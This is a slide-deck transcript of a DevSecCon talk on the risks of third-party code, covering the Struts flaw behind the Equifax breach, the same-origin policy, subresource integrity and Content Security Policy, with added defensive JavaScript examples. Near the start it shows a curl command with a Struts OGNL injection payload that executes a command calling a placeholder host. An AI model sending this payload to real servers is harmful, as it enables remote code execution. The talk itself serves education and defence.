Date posted: 21-Jan-2018
Category: Technology
Uploaded by: devseccon-limited
Join the conversation #DevSecCon
BY TIM KADLEC @TKADLEC
Their Problems Are Your Problems
THEIR PROBLEMS ARE YOUR PROBLEMS
Tim Kadlec | @tkadlec
HELL IS OTHER PEOPLE’S CODE
CONTEXT
OPINIONS
ASSUMPTIONS
WEB IS POWERED BY OTHER PEOPLE’S CODE
9 MILLION Different Users
28% More artifacts indexed in past year
23,411,471 Packages downloaded per month
HUGE BOOST FOR PRODUCTIVITY
1,000 DEPENDENCIES
~5 CONTRIBUTORS
5,000 DEVELOPERS
OFFLOAD THE WORK But not the RISK
OFFLOAD THE WORK But not the RESPONSIBILITY
curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#[email protected]@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException {
    ...
    if (content_type != null && content_type.contains("multipart/form-data")) {
        ...
        request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup);
    } else {
        request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup);
    }
    return request;
}
String errorMessage = buildErrorMessage(e, new Object[]{e.getPermittedSize(), e.getActualSize()});
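The Struts path shown above trusts the Content-Type header far enough to copy it into an error message. The check a defender wants at that boundary is structural: does the header even look like a media type? The following is an added example, written in JavaScript for this page and not code from the talk or from Apache Struts; it validates a Content-Type value against the media-type grammar (type/subtype plus optional ;name=value parameters), substitutes a fixed placeholder for anything that fails before it can reach a message, and runs the same check over a few constructed request-log lines in an invented log format.

```javascript
// Added example, not part of the talk or of Apache Struts: validate a
// Content-Type header against the media-type grammar before any code path
// copies it into an error message, and scan constructed log lines for
// values that fail that check.
const TCHAR = "[!#$%&'*+.^_`|~0-9A-Za-z-]+";          // RFC 7230 token characters
const QUOTED = '"(?:[^"\\\\]|\\\\.)*"';               // quoted-string parameter value
const MEDIA_TYPE_RE = new RegExp(
  `^${TCHAR}/${TCHAR}(?:\\s*;\\s*${TCHAR}=(?:${TCHAR}|${QUOTED}))*\\s*$`
);

// True only for "type/subtype" optionally followed by ";name=value" parameters.
// Expression-language markers such as "%{" or "${" can never pass, because
// "{" is not a token character and no "/" follows the leading token.
function isWellFormedContentType(value) {
  return MEDIA_TYPE_RE.test(value);
}

// Anything that reaches a user-visible or logged message must be validated
// first; an unparseable header is replaced by a fixed placeholder.
function contentTypeForMessage(value) {
  return isWellFormedContentType(value) ? value : "<invalid content-type>";
}

// Constructed log format (invented for this example):
//   <client-ip> "<request line>" "<content-type, or - when absent>"
const LOG_LINE_RE = /^(\S+) "([^"]*)" "([^"]*)"$/;

// Returns one finding per line whose Content-Type fails the grammar check.
function scanLog(lines) {
  const findings = [];
  lines.forEach((line, index) => {
    const m = LOG_LINE_RE.exec(line);
    if (!m) return;
    const [, client, request, contentType] = m;
    if (contentType === "-") return; // header not sent
    if (!isWellFormedContentType(contentType)) {
      findings.push({ line: index + 1, client, request, contentType });
    }
  });
  return findings;
}

// Constructed sample lines; the third carries a generic expression probe.
const SAMPLE_LOG = [
  '203.0.113.10 "POST /upload.action HTTP/1.1" "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"',
  '203.0.113.11 "GET /index.action HTTP/1.1" "-"',
  '203.0.113.12 "POST /upload.action HTTP/1.1" "%{7*7}"',
  '203.0.113.13 "POST /api HTTP/1.1" "application/json; charset=utf-8"',
];

for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`line ${f.line}: ${f.client} sent malformed Content-Type ${JSON.stringify(f.contentType)}`);
}
```

The grammar check is deliberately strict rather than a denylist of known bad substrings: a header that is not a media type has no business being treated as one, and rejecting it up front means no later code path has to reason about what it might contain.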
MARCH 6: FIXED VERSION RELEASED
MARCH 7: EXPLOIT SCRIPTS APPEAR
MAY 13-JULY 30: EQUIFAX BREACH
SEPTEMBER 7: BREACH ANNOUNCED
[Chart: OPEN-SOURCE LIBRARY VULNS BY YEAR, 2007-2017; y-axis 0-900]
“The human error was that the individual who’s responsible for communicating in the organization to apply the patch, did not.”
EVERYONE’S RESPONSIBILITY
LAYERS OF DEFENSE
77% USE A VULNERABLE JS LIBRARY
~35% Third-Party Resources (2013)
~53% Third-Party Resources (2017)
77-99% Third-Party Resources
38% of sites
SAME-ORIGIN POLICY
ORIGIN: SCHEME + HOSTNAME + PORT
Compared with http://foo.com/index.html:
  http://foo.com/about.html    - same origin (only the path differs)
  https://foo.com/index.html   - different origin (scheme)
  http://a.foo.com/about.html  - different origin (hostname)
  http://foo.com:80/about.html - same origin (80 is the default port for http)
  http://foo.com:81/about.html - different origin (port)
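The comparison table above is the whole rule; the following added example (not code from the talk) makes it executable. It derives the scheme, hostname and port the same-origin policy compares, using the WHATWG URL class that ships with Node.js and browsers, and reports which component makes two URLs differ. The only subtlety it handles is that URL drops an explicit port equal to the scheme default, so :80 on an http URL has to be normalised back before comparing.

```javascript
// Added example, not part of the talk: compute the (scheme, host, port)
// tuple the same-origin policy compares and explain why two URLs do or do
// not share an origin.
const DEFAULT_PORTS = { "http:": "80", "https:": "443", "ws:": "80", "wss:": "443" };

function originOf(urlString) {
  const u = new URL(urlString);
  // URL drops an explicit port equal to the scheme default, so both
  // http://foo.com:80/ and http://foo.com/ report port "" here; restore the
  // default so the comparison is explicit.
  return {
    scheme: u.protocol,
    host: u.hostname,
    port: u.port || DEFAULT_PORTS[u.protocol] || "",
  };
}

// Names of the origin components that differ; an empty list means same origin.
function originDifferences(urlA, urlB) {
  const a = originOf(urlA);
  const b = originOf(urlB);
  return ["scheme", "host", "port"].filter((k) => a[k] !== b[k]);
}

function sameOrigin(urlA, urlB) {
  return originDifferences(urlA, urlB).length === 0;
}

// Reproduces the slide's comparison table against a base document URL.
function compareAgainstBase(base, candidates) {
  return candidates.map((url) => {
    const differs = originDifferences(base, url);
    return { url, sameOrigin: differs.length === 0, differs };
  });
}

const BASE = "http://foo.com/index.html";
const CANDIDATES = [
  "http://foo.com/about.html",
  "https://foo.com/index.html",
  "http://a.foo.com/about.html",
  "http://foo.com:80/about.html",
  "http://foo.com:81/about.html",
];

for (const row of compareAgainstBase(BASE, CANDIDATES)) {
  const verdict = row.sameOrigin ? "same origin" : `different origin (${row.differs.join(", ")})`;
  console.log(`${row.url}  ->  ${verdict}`);
}
```

Note that switching http to https changes the default port as well, so that row reports both scheme and port as different; either alone is enough to make the browser treat the two documents as separate origins.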
--disable-web-security
about:blank
javascript:
var xhr = new XMLHttpRequest(); xhr.open('GET', "https://www.devseccon.com/"); xhr.send();
<script src="..."></script>
<img src="..." />
<link href="..." />
SUBRESOURCE INTEGRITY
<script src="https://foo.com/framework.js" integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"></script>
CONTENT SECURITY POLICY (CSP)
SAME-ORIGIN POLICY?
WHITELIST
Content-Security-Policy: policy;
Content-Security-Policy: resource-directive source-list;
Content-Security-Policy: script-src 'self' https://apis.google.com;
base-uri child-src connect-src font-src form-action frame-ancestors img-src
media-src object-src plugin-types report-uri style-src script-src upgrade-insecure-requests
Content-Security-Policy: default-src 'self';
'none' 'self' 'unsafe-inline' 'unsafe-eval'
Content-Security-Policy: default-src 'self'; script-src 'nonce-2726c7f26c'
<script nonce="2726c7f26c"> alert(123); </script>
Content-Security-Policy: script-src 'sha256-cLuU6nVzrYJlo7rUa6PFrPQrEUpOHllb5ic='
Content-Security-Policy-Report-Only:
CONTENT-SECURITY-POLICY: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.gravatar.com *.wp.com *.githubusercontent.com; media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com
Content-Security-Policy-Report-Only: default-src https:; form-action https:; report-uri https://myreport.com;
Content-Security-Policy: default-src https:; form-action https:; report-uri https://myreport.com;
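Reading a policy like GitHub's above is easier once the matching rules are explicit. The following added example (not code from the talk or from GitHub) is a small CSP evaluator: it parses a header value into directives, matches a resource URL against the source expressions the slides list ('self', 'none', scheme sources such as https: and data:, host sources with optional scheme, port and a leading *. wildcard), and applies the fallback from a fetch directive to default-src, which base-uri, form-action and frame-ancestors do not get. Nonces and hashes are recognised only to the extent that they never match a URL; the sample policy is a trimmed-down version of the one on the slide.

```javascript
// Added example, not part of the talk: a minimal Content-Security-Policy
// parser and source-expression matcher.
const DEFAULT_PORTS = { "http:": "80", "https:": "443", "ws:": "80", "wss:": "443" };

// Directives that do not fall back to default-src when absent.
const NO_FALLBACK = new Set(["base-uri", "form-action", "frame-ancestors"]);

// "default-src 'self'; script-src a.example" -> { "default-src": ["'self'"], "script-src": ["a.example"] }
function parsePolicy(headerValue) {
  const policy = {};
  for (const part of headerValue.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy[name.toLowerCase()] = sources;
  }
  return policy;
}

function effectivePort(url) {
  return url.port || DEFAULT_PORTS[url.protocol] || "";
}

// Does one source expression permit loading resourceUrl from a page at pageOrigin?
function sourceMatches(source, resourceUrl, pageOrigin) {
  const r = new URL(resourceUrl);
  if (source === "'none'") return false;
  if (source === "'self'") return r.origin === new URL(pageOrigin).origin;
  if (source.startsWith("'")) return false;            // 'unsafe-inline', nonces, hashes: never a URL match
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) {          // scheme-source such as https: or data:
    return r.protocol === source.toLowerCase();
  }
  // host-source: [scheme://]host[:port][/path]; path matching is left out here
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\s:\/]+)(?::(\d+|\*))?(?:\/.*)?$/i.exec(source);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme) {
    if (r.protocol !== `${scheme.toLowerCase()}:`) return false;
  } else {
    // Without an explicit scheme the resource must use the page's scheme
    // or its secure upgrade (http -> https, ws -> wss).
    const pageProto = new URL(pageOrigin).protocol;
    const upgrade = { "http:": "https:", "ws:": "wss:" }[pageProto];
    if (r.protocol !== pageProto && r.protocol !== upgrade) return false;
  }
  if (host === "*") {
    // any host
  } else if (host.startsWith("*.")) {
    if (!r.hostname.endsWith(host.slice(1).toLowerCase())) return false;
  } else if (r.hostname !== host.toLowerCase()) {
    return false;
  }
  if (port && port !== "*" && effectivePort(r) !== port) return false;
  return true;
}

// Resolve the governing directive (with default-src fallback where the spec
// allows it) and test the resource against its source list. A load that no
// directive governs is unrestricted.
function isAllowed(policyText, directive, resourceUrl, pageOrigin) {
  const policy = parsePolicy(policyText);
  const own = policy[directive];
  const sources = own ?? (NO_FALLBACK.has(directive) ? undefined : policy["default-src"]);
  if (!sources) return true;
  return sources.some((s) => sourceMatches(s, resourceUrl, pageOrigin));
}

// Trimmed-down version of the policy shown on the slide (constructed subset).
const SAMPLE_POLICY =
  "default-src 'none'; connect-src 'self' api.github.com wss://live.github.com; " +
  "img-src 'self' data: *.githubusercontent.com; script-src assets-cdn.github.com; " +
  "form-action 'self' gist.github.com; frame-ancestors 'none'";
const PAGE = "https://github.com";

for (const [directive, url] of [
  ["script-src", "https://assets-cdn.github.com/app.js"],
  ["script-src", "https://cdn.example/app.js"],
  ["img-src", "https://avatars.githubusercontent.com/u/1"],
  ["connect-src", "wss://live.github.com/socket"],
  ["font-src", "https://fonts.example/f.woff"],
]) {
  console.log(directive.padEnd(12), url.padEnd(45), isAllowed(SAMPLE_POLICY, directive, url, PAGE) ? "allowed" : "blocked");
}
```

Two details worth noticing from the output: font-src is blocked because the policy has no font-src and default-src is 'none', and a policy such as the slide's `default-src 'self'; script-src 'nonce-2726c7f26c'` blocks every external script, including ones from the page's own origin, because once script-src is present it replaces default-src rather than adding to it.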
SERVERLESS & PAAS
UNPATCHED SERVERS
COMPROMISED SERVERS
WHAT’S THE PATH OF LEAST RESISTANCE?
SECURE BY DEFAULT
OFFLOAD THE WORK But not the RESPONSIBILITY
REAL PEOPLE PAYING THE PRICE
SYSTEM CONFIGURATION
NETWORK LAYER
FRONT-END CODE
BACK-END COMPONENTS
THIRD-PARTY SERVICES
LAYERS OF DEFENSE
EVERYONE’S RESPONSIBILITY
BRING SECURITY TO THE TEAM
WEB IS POWERED BY OTHER PEOPLE’S CODE
WEB’S SAFETY & STABILITY IS UP TO US
Thank you! Tim Kadlec | @tkadlec